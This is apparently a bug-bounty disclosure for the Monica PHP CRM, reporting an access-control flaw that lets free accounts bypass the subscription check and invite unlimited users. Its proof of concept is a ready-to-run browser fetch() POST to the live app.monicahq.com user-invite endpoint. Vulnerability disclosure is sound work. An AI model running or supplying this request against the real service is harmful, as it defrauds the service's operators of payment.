monica

vulnerability improper access control - generic (cwe-284)
severity 8.8
language php
registry other

✍️ Description

Bypass payment verification and add more user. From free account user only allow 1 user . but using this bug user can add more users for free

🕵️‍♂️ Proof of Concept

  1. First goto https://app.monicahq.com/settings/users from free account . Now try to invite a new user but it will ask you pro subscriptions . Now bypass this payment and add more user using bellow request
await fetch("https://app.monicahq.com/settings/users", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"
    },
    "body": "_token=RO5UHOXKg6GWDtSlSpfcQEFtN4Dpo1cwW3ueFMEa&email=mannnn%40localhost.com&confirmation=1",
    "method": "POST",
    "mode": "cors"
});

here change your token in request body and open your browser console and execute above code and see new user is invited . Using this bug user can invite unlimited user for free. See bellow video poc

VIDEO POC--->

https://drive.google.com/file/d/1pZuHpx736JuQgX6gjan2sQisfHgGRS0n/view?usp=sharing

💥 Impact

Bypass payment method